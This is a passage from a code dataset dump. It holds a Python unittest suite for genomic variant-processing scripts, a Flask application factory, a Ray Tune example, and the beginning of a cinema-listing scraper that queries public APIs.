self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# groom_cravat_annotation.py\n def test_groom_cravat_annotation_for_coding_variants_tab( self ):\n \"\"\"\n Test groom_cravat_annotation for a coding variants tab file.\n \"\"\"\n # Create test environment\n str_groom_script = os.path.join( self.str_script_dir, \"groom_cravat_annotation.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_groom_cravat_annotations_coding.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_groom_cravat_annotations_coding_ANSWER.tab\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_groom_cravat_annotations_coding.tab\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_groom_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_groom_cravat_annotation_for_noncoding_variants_tab( self ):\n \"\"\"\n Test groom_cravat_annotation for a noncoding variants tab file.\n \"\"\"\n # Create test environment\n str_groom_script = os.path.join( self.str_script_dir, \"groom_cravat_annotation.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_groom_cravat_annotations_noncoding.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_groom_cravat_annotations_noncoding_ANSWER.tab\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_groom_cravat_annotations_noncoding.tab\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_groom_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# groom_vcf_gatk.py\n def test_groom_vcf_gatk_for_good_vcf( self ):\n \"\"\"\n Test filter_groom_vcf_gatk for a vcf not needed to be filtered\n \"\"\"\n # Create test environment\n str_groom_script = os.path.join( self.str_script_dir, \"groom_vcf.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk_for_good_vcf_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_groom_vcf_gatk_for_good_vcf.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_groom_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_groom_vcf_gatk_for_remove_spaces_vcf( self ):\n \"\"\"\n Test filter_groom_vcf_gatk for a vcf which needs spaces removed.\n \"\"\"\n # Create test environment\n str_groom_script = os.path.join( self.str_script_dir, \"groom_vcf.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk_spaces.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk_for_remove_spaces_vcf_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_groom_vcf_gatk_for_remove_spaces_vcf.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_groom_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_groom_vcf_gatk_for_42features_vcf( self ):\n \"\"\"\n Test filter_groom_vcf_gatk for a vcf with VCF 4.2 features\n \"\"\"\n # Create test environment\n str_groom_script = os.path.join( self.str_script_dir, \"groom_vcf.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk_42features.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk_for_42features_vcf_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_groom_vcf_gatk_for_42features_vcf.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_groom_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# reduce_vcf_to_snps.py\n def test_reduce_vcf_to_snp_for_small_file_no_filter( self ):\n \"\"\"\n Test reducing the vcf file to snps for a file that is small (less than 100) and should not be filtered.\n \"\"\"\n # Create test environment\n str_filtered_vcf_script = os.path.join( self.str_script_dir, \"reduce_vcf_to_snps.py\" )\n str_filtered_vcf_test_file = os.path.join( self.str_test_data_dir, \"test_reduce_vcf_to_snp_for_small_file_no_filter.vcf\" )\n str_filtered_vcf = os.path.join( self.str_test_data_dir_working, \"test_reduce_vcf_to_snp_for_small_file_no_filter_RESULT.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_filtered_vcf_script, \"--reference\", str_filtered_vcf_test_file, str_filtered_vcf ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_filtered_vcf, str_filtered_vcf_test_file )\n # Destroy environment\n self.func_remove_files( [ str_filtered_vcf ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_reduce_vcf_to_snp_for_small_file_filter_reference( self ):\n \"\"\"\n Test reducing the vcf file to snps for a file that is small (less than 100) and should be filtered.\n When filtering as a reference, it will not have PASS info so this is ignored.\n \"\"\"\n\n # Create test environment\n str_filtered_vcf_script = os.path.join( self.str_script_dir, \"reduce_vcf_to_snps.py\" )\n str_filtered_vcf_test_file = os.path.join( self.str_test_data_dir, \"test_reduce_vcf_to_snp_for_small_file_filter.vcf\" )\n str_filtered_vcf_answer = os.path.join( self.str_test_data_dir, \"test_reduce_vcf_to_snp_for_small_file_filter_reference_ANSWER.vcf\" )\n str_filtered_vcf_result = os.path.join( self.str_test_data_dir_working, \"test_reduce_vcf_to_snp_for_small_file_filter_reference_RESULT.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n\n # Call Example script\n str_command = \" \".join( [ str_filtered_vcf_script, \"--reference\", str_filtered_vcf_test_file, str_filtered_vcf_result ] )\n Commandline.Commandline().func_CMD( str_command )\n\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_filtered_vcf_answer, str_filtered_vcf_result )\n\n # Destroy environment\n self.func_remove_files( [ str_filtered_vcf_result ] )\n\n # Evaluate\n self.func_test_true( f_success )\n\n def test_reduce_vcf_to_snp_for_small_file_filter( self ):\n \"\"\"\n Test reducing the vcf file to snps for a file that is small (less than 100) and should be filtered.\n \"\"\"\n\n # Create test environment\n str_filtered_vcf_script = os.path.join( self.str_script_dir, \"reduce_vcf_to_snps.py\" )\n str_filtered_vcf_test_file = os.path.join( self.str_test_data_dir, \"test_reduce_vcf_to_snp_for_small_file_filter.vcf\" )\n str_filtered_vcf_answer = os.path.join( self.str_test_data_dir, \"test_reduce_vcf_to_snp_for_small_file_filter_ANSWER.vcf\" )\n str_filtered_vcf_result = os.path.join( self.str_test_data_dir_working, \"test_reduce_vcf_to_snp_for_small_file_filter_RESULT.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n\n # Call Example script\n str_command = \" \".join( [ str_filtered_vcf_script, str_filtered_vcf_test_file, str_filtered_vcf_result ] )\n Commandline.Commandline().func_CMD( str_command )\n\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_filtered_vcf_answer, str_filtered_vcf_result )\n\n # Destroy environment\n self.func_remove_files( [ str_filtered_vcf_result ] )\n\n # Evaluate\n self.func_test_true( f_success )\n\n# vcfs_to_snp_calls_tab.py\n def test_vcfs_to_snp_calls_tab_filter_maf_vcf( self ):\n \"\"\"\n Test vcfs_to_snp_calls_tab.py with filtering. Inputs are maf and vcf files.\n \"\"\"\n # Create test environment\n str_snp_calls_script = os.path.join( self.str_script_dir, \"vcfs_to_snp_calls_tab.py\" )\n str_snp_calls_input_file_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_filter.maf\" )\n str_maf_tumor_key = \"test\"\n str_snp_calls_input_file_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.vcf\" )\n str_snp_calls_input_depth_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.depth\" )\n str_snp_calls_input_depth_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.depth\" )\n str_snp_calls_answer = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_filter_maf_vcf_1_ANSWER_sorted.tab\" )\n str_snp_calls_result = os.path.join( self.str_test_data_dir_working, \"vcfs_to_snp_calls_tab_filter_maf_vcf_1_RESULT.tab\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_snp_calls_script, \"--maf_reference\", str_snp_calls_input_file_1, \"--tumor\", str_maf_tumor_key,\n \"--vcf\", str_snp_calls_input_file_2, \"--count_reference\", str_snp_calls_input_depth_1,\n \"--count\", str_snp_calls_input_depth_2, str_snp_calls_result ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n lstr_answer_lines = None\n with open( str_snp_calls_answer, \"r\" ) as hndl_answer:\n lstr_answer_lines = [ str_line for str_line in hndl_answer.read().split(\"\\n\") if str_line ]\n lstr_answer_lines.sort()\n lstr_result_lines = None\n with open( str_snp_calls_result, \"r\" ) as hndl_result:\n lstr_result_lines = [ str_line for str_line in hndl_result.read().split(\"\\n\") if str_line ]\n lstr_result_lines.sort()\n # Destroy environment\n self.func_remove_files( [ str_snp_calls_result ] )\n # Evaluate\n self.func_test_equals( \"\\n\".join( lstr_answer_lines), \"\\n\".join( lstr_result_lines ) )\n\n def test_vcfs_to_snp_calls_tab_filter_maf_vcf_2( self ):\n \"\"\"\n Test vcfs_to_snp_calls_tab.py with filtering. Inputs are maf and vcf 2 files.\n \"\"\"\n # Create test environment\n str_snp_calls_script = os.path.join( self.str_script_dir, \"vcfs_to_snp_calls_tab.py\" )\n str_snp_calls_input_file_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_filter.maf\" )\n str_maf_tumor_key = \"test\"\n str_snp_calls_input_file_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_2_filter.vcf\" )\n str_snp_calls_input_depth_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.depth\" )\n str_snp_calls_input_depth_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_2_filter.depth\" )\n str_snp_calls_answer = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_filter_maf_vcf_2_ANSWER_sorted.tab\" )\n str_snp_calls_result = os.path.join( self.str_test_data_dir_working, \"vcfs_to_snp_calls_tab_filter_maf_vcf_2_RESULT.tab\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_snp_calls_script, \"--maf_reference\", str_snp_calls_input_file_1, \"--tumor\", str_maf_tumor_key,\n \"--vcf\", str_snp_calls_input_file_2, \"--count_reference\", str_snp_calls_input_depth_1,\n \"--count\", str_snp_calls_input_depth_2, str_snp_calls_result ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n lstr_answer_lines = None\n with open( str_snp_calls_answer, \"r\" ) as hndl_answer:\n lstr_answer_lines = [ str_line for str_line in hndl_answer.read().split(\"\\n\") if str_line ]\n lstr_answer_lines.sort()\n lstr_result_lines = None\n with open( str_snp_calls_result, \"r\" ) as hndl_result:\n lstr_result_lines = [ str_line for str_line in hndl_result.read().split(\"\\n\") if str_line ]\n lstr_result_lines.sort()\n # Destroy environment\n self.func_remove_files( [ str_snp_calls_result ] )\n # Evaluate\n self.func_test_equals( \"\\n\".join( lstr_answer_lines), \"\\n\".join( lstr_result_lines ) )\n\n def test_vcfs_to_snp_calls_tab_filter_vcf_1_2( self ):\n \"\"\"\n Test vcfs_to_snp_calls_tab.py with filtering. Inputs are and vcf 1 and 2 files.\n \"\"\"\n # Create test environment\n str_snp_calls_script = os.path.join( self.str_script_dir, \"vcfs_to_snp_calls_tab.py\" )\n str_snp_calls_input_file_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.vcf\" )\n str_snp_calls_input_file_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_2_filter.vcf\" )\n str_snp_calls_input_depth_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.depth\" )\n str_snp_calls_input_depth_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_2_filter.depth\" )\n str_snp_calls_answer = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_filter_vcf_1_2_ANSWER_sorted.tab\" )\n str_snp_calls_result = os.path.join( self.str_test_data_dir_working, \"vcfs_to_snp_calls_tab_filter_vcf_1_2_RESULT.tab\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_snp_calls_script, \"--vcf_reference\", str_snp_calls_input_file_1,\n \"--vcf\", str_snp_calls_input_file_2, \"--count_reference\", str_snp_calls_input_depth_1,\n \"--count\", str_snp_calls_input_depth_2, str_snp_calls_result ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n lstr_answer_lines = None\n with open( str_snp_calls_answer, \"r\" ) as hndl_answer:\n lstr_answer_lines = [ str_line for str_line in hndl_answer.read().split(\"\\n\") if str_line ]\n lstr_answer_lines.sort()\n lstr_result_lines = None\n with open( str_snp_calls_result, \"r\" ) as hndl_result:\n lstr_result_lines = [ str_line for str_line in hndl_result.read().split(\"\\n\") if str_line ]\n lstr_result_lines.sort()\n # Destroy environment\n self.func_remove_files( [ str_snp_calls_result ] )\n # Evaluate\n self.func_test_equals( \"\\n\".join( lstr_answer_lines), \"\\n\".join( lstr_result_lines ) )\n\n# vcfs_to_genotype_matrix.py\n# This is for validation only, not for the pipeline runs.\n# Under development.\n def not_test_vcfs_to_genotype_matrix_1_file( self ):\n \"\"\"\n Test vcfs_to_genotype_matrix.py with one input file.\n \"\"\"\n # Create test environment\n str_genotype_script = os.path.join( self.str_script_dir, \"vcfs_to_genotype_matrix.py\" )\n str_vcf_directory = os.path.join( self.str_test_data_dir, \"test_vcf_genotype_matrix_dir_1\" )\n str_genotype_answer = os.path.join( self.str_test_data_dir, \"vcfs_to_genotype_matrix_1_ANSWER.txt\" )\n str_genotype_result = os.path.join( self.str_test_data_dir_working, \"vcfs_to_genotype_matrix_1_RESULT.txt\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_genotype_script, \"--matrix\", str_genotype_result, str_vcf_directory ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_genotype_answer, str_genotype_result )\n # Destroy environment\n self.func_remove_files( [ str_genotype_result ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def not_test_vcfs_to_genotype_matrix_3_file( self ):\n \"\"\"\n Test vcfs_to_genotype_matrix.py with one input file in one directory and 2 in another.\n \"\"\"\n # Create test environment\n str_genotype_script = os.path.join( self.str_script_dir, \"vcfs_to_genotype_matrix.py\" )\n str_vcf_directory_1 = os.path.join( self.str_test_data_dir, \"test_vcf_genotype_matrix_dir_1\" )\n str_vcf_directory_2 = os.path.join( self.str_test_data_dir, \"test_vcf_genotype_matrix_dir_2\" )\n str_genotype_answer = os.path.join( self.str_test_data_dir, \"vcfs_to_genotype_matrix_3_ANSWER.txt\" )\n str_genotype_result = os.path.join( self.str_test_data_dir_working, \"vcfs_to_genotype_matrix_3_RESULT.txt\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_genotype_script, \"--matrix\", str_genotype_result, str_vcf_directory_1, str_vcf_directory_2 ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_genotype_answer, str_genotype_result )\n # Destroy environment\n self.func_remove_files( [ str_genotype_result ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# visualize_mutation_depth_tab_files.R\n# This is for validation only, not for the pipeline runs.\n# Under development.\n def not_test_visualize_mutation_depth_tab_files_for_error_counts_opt( self ):\n \"\"\"\n Tests to make sure the TP, FP, FN, senstivity, and specificity measurements are correct from a test data set.\n This is testing output that has a changing feature space (optimization figure) and not the \"ROC\" plot.\n \"\"\"\n # Create environment\n str_vis_script = os.path.join( self.str_script_dir, \"visualize_mutation_depth_tab_files.R\" )\n str_test_input_file = os.path.join( self.str_test_data_dir, \"test_visualize_tab.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_visualize_mutation_depth_tab_files_for_error_counts_opt_ANSWER.txt\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_data.txt\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call example script\n str_command = \" \".join( [ str_vis_script, \"-o\", self.str_test_data_dir_working, \"-k RNA_DNA\", str_test_input_file ])\n Commandline.Commandline().func_CMD( str_command )\n # Check for sucess\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file, os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_depth_distributions.pdf\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_fdr_min_read_coverage_norm.pdf\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_data_truth_held.txt\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_optimize_detail_validation.pdf\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_raw_class_distributions_detail_validation.pdf\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_roc_detail_validation.pdf\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_sensitivity_min_read_coverage_norm.pdf\" ) ] )\n self.func_remove_dirs( [ self.str_test_data_dir_working ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def not_test_visualize_mutation_depth_tab_files_for_error_counts_roc( self ):\n \"\"\"\n Tests to make sure the TP, FP, FN, senstivity, and specificity measurements are correct from a test data set.\n This is testing output that has a set feature space (the \"ROC\" plot) and not the optimization plot.\n \"\"\"\n # Create environment\n str_vis_script = os.path.join( self.str_script_dir, \"visualize_mutation_depth_tab_files.R\" )\n str_test_input_file = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab\" )\n str_answer_file_1 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_1_answer.txt\" )\n str_answer_file_2 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_2_answer.txt\" )\n str_answer_file_3 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_3_answer.txt\" )\n str_answer_file_4 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_4_answer.txt\" )\n str_result_file_1 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_1.txt\" )\n str_result_file_2 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_2.txt\" )\n str_result_file_3 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_3.txt\" )\n str_result_file_4 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_4.txt\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call example script\n str_command = \" \".join( [ str_vis_script, \"-o\", self.str_test_data_dir_working, \"-k RNA_DNA\", str_test_input_file ])\n Commandline.Commandline().func_CMD( str_command )\n # Check for sucess\n f_success_1 = self.func_are_files_equivalent( str_answer_file_1, str_result_file_1 )\n f_success_2 = self.func_are_files_equivalent( str_answer_file_2, str_result_file_2 )\n f_success_3 = self.func_are_files_equivalent( str_answer_file_3, str_result_file_3 )\n f_success_4 = self.func_are_files_equivalent( str_answer_file_4, str_result_file_4 )\n # Destroy environment\n# self.func_remove_files( [ os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_depth_distributions.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_fdr_min_read_coverage_norm.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data.txt\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_raw_class_distributions_detail_validation.pdf\" ),\n # os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_roc.pdf\" ),\n # os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_optimize_detail_validation.pdf\" ),\n # os.path.join( str_result_file_1 ),\n # os.path.join( str_result_file_2 ),\n # os.path.join( str_result_file_3 ),\n # os.path.join( str_result_file_4 ),\n # os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_sensitivity_min_read_coverage_norm.pdf\" ) ] )\n # self.func_remove_dirs( [ self.str_test_data_dir_working ] )\n # Evaluate\n self.func_test_true( f_success_1 and f_success_2 and f_success_3 and f_success_4 )\n\n def not_test_visualize_mutation_depth_tab_files_for_roc_like_rnaseq( self ):\n \"\"\"\n Tests to make sure the TP, FP, FN, senstivity, and specificity measurements are correct from a test data set.\n This is testing output that has a set feature space (the \"ROC\" plot) and not the optimization plot.\n\n The other test uses a simple input data set similar to traditional ROC data, this one have varying RNA seq depth and\n such that allows a more authentic test.\n \"\"\"\n # Create environment\n str_vis_script = os.path.join( self.str_script_dir, \"visualize_mutation_depth_tab_files.R\" )\n str_test_input_file = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc_like_rnaseq.tab\" )\n str_answer_file_1 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_1_answer.txt\" )\n str_answer_file_2 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_like_ranseq_2_answer.txt\" )\n str_answer_file_3 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_3_answer.txt\" )\n str_answer_file_4 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_4_answer.txt\" )\n str_result_file_1 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_1.txt\" )\n str_result_file_2 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_2.txt\" )\n str_result_file_3 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_3.txt\" )\n str_result_file_4 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_4.txt\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call example script\n str_command = \" \".join( [ str_vis_script, \"-o\", self.str_test_data_dir_working, \"-k RNA_DNA\", str_test_input_file ])\n Commandline.Commandline().func_CMD( str_command )\n # Check for sucess\n f_success_1 = self.func_are_files_equivalent( str_answer_file_1, str_result_file_1 )\n f_success_2 = self.func_are_files_equivalent( str_answer_file_2, str_result_file_2 )\n f_success_3 = self.func_are_files_equivalent( str_answer_file_3, str_result_file_3 )\n f_success_4 = self.func_are_files_equivalent( str_answer_file_4, str_result_file_4 )\n # Destroy environment\n# self.func_remove_files( [ os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_depth_distributions.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_fdr_min_read_coverage_norm.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_data.txt\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_raw_class_distributions_detail_validation.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_roc.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_optimize_detail_validation.pdf\" ),\n# os.path.join( str_result_file_1 ),\n# os.path.join( str_result_file_2 ),\n# os.path.join( str_result_file_3 ),\n# os.path.join( str_result_file_4 ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_sensitivity_min_read_coverage_norm.pdf\" ) ] )\n # self.func_remove_dirs( [ self.str_test_data_dir_working ] )\n # Evaluate\n self.func_test_true( f_success_1 and f_success_2 and f_success_3 and f_success_4 )\n\n# Creates a suite of tests\ndef suite():\n return unittest.TestLoader().loadTestsFromTestCase( ScriptTester )\n"} {"ext": "py", "sha": "1a31482b056d765cca1ff45d2969e3da585ccfb8", "content": "from flask import Flask\nfrom config import config_options\nfrom flask_bootstrap import Bootstrap\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_uploads import UploadSet,configure_uploads,IMAGES\nfrom flask_mail import Mail\n\nbootstrap = Bootstrap()\n\ndb = SQLAlchemy()\n\nlogin_manager = LoginManager()\nlogin_manager.session_protection = 'strong'\nlogin_manager.login_view = 'auth.login'\n\nphotos = UploadSet('photos',IMAGES)\n\nmail = Mail()\n\ndef create_app(config_name):\n\n app = Flask(__name__)\n\n # Creating the app configurations\n app.config.from_object(config_options[config_name])\n\n # Initializing flask extensions\n bootstrap.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n mail.init_app(app)\n \n # configure UploadSet\n configure_uploads(app,photos)\n\n # Registering the blueprints\n from .rental_hub import rental_hub as rental_hub_blueprint\n app.register_blueprint(rental_hub_blueprint)\n\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint,url_prefix = '/authenticate')\n\n \n\n return app\n"} {"ext": "py", "sha": "1a314856063667ae07023040d95eb91d76c46511", "content": "\"\"\"Test of Ray-tune without RLLib\"\"\"\nfrom ray import tune\n\n\ndef objective(step, alpha, beta):\n return (0.1 + alpha * step / 100)**(-1) + beta * 0.1\n\n\ndef train(config):\n alpha, beta = config[\"alpha\"], config[\"beta\"]\n for step in range(10):\n score = objective(step, alpha, beta)\n tune.report(mean_loss=score)\n\n\nanalysis = tune.run(\n train,\n config={\n \"alpha\": tune.grid_search([0.001, 0.01]),\n \"beta\": tune.choice([1, 2])\n })\n\nprint(\"Best config: \", analysis.get_best_config(metric=\"mean_loss\", mode=\"min\"))\n"} {"ext": "py", "sha": "1a314b307aa544252aa42c8ee155003b1a28b4aa", "content": "from concurrent import futures\nfrom bs4 import BeautifulSoup\nimport pprint\nimport concurrent\nimport requests\nimport re\nimport time\nimport sys\n\nMILE_TO_KM = 1.60934\nCINEMA_MATCH_REGEX = r\"(?P<cinema>[^,]*)\"\nNUM_OF_CINEMAS = 25\n\n# TODO: PLEASE DON'T USE THESE METHODS TOO MUCH. THEY ACTUALLY QUERY THE API.\n# IF YOU'RE GOING TO USE A LOT, SAVE THE DATA YOURSELF FOR TESTING.\nCINEMAS = []\nCINEMA_CID = {}\nCINEMA_DIST = {}\nF_TO_CINEMAS = {}\nFCID_TO_TIMES = {}\nF_CINEMA_TO_TIMES = {}\n\n\nclass DataParser:\n def get_cinemas_latlong(self, latitude, longitude):\n \"\"\"\n Give this function a longitude and latitude and CINEMAS, CINEMA_IDS and\n DISTANCES lists are populated with (up to) 5 results.\n \"\"\"\n print latitude, longitude\n sys.stdout.flush()\n global CINEMAS, CINEMA_CID, CINEMA_DIST\n film_names = requests.get(\n \"https://api.cinelist.co.uk/search/cinemas/coordinates/{}/{}\".\n format(latitude, longitude))\n cinemas = film_names.json()[\"cinemas\"][:NUM_OF_CINEMAS]\n for i in cinemas:\n # Runs regex over cinemas to remove the location\n cinema_name = re.match(CINEMA_MATCH_REGEX, i['name']).group(\"cinema\")\n # Dict storing {cinema name: cinema ID}\n CINEMA_CID[cinema_name] = i['id']\n # Converts distance from mile to km and rounds to 3dp.\n # Dict storing {cinema name: distance}\n CINEMA_DIST[cinema_name] = round(i['distance'] * MILE_TO_KM, 3)\n\n def get_latlong(self, postcode):\n \"\"\"\n Give this function a postcode and get the corresponding latitude and\n longitude.\n \"\"\"\n location_data = requests.get(\n \"http://api.postcodes.io/postcodes/{}\".format(postcode))\n location_data = location_data.json()\n latitude = location_data['result']['latitude']\n longitude = location_data['result']['longitude']\n return round(latitude, 6), round(longitude, 6)\n\n def get_cinema_url(self, cinema):\n search_url = 'https://www.google.co.uk/search?q=' + cinema\n res = requests.get(search_url)\n soup = BeautifulSoup(res.text, 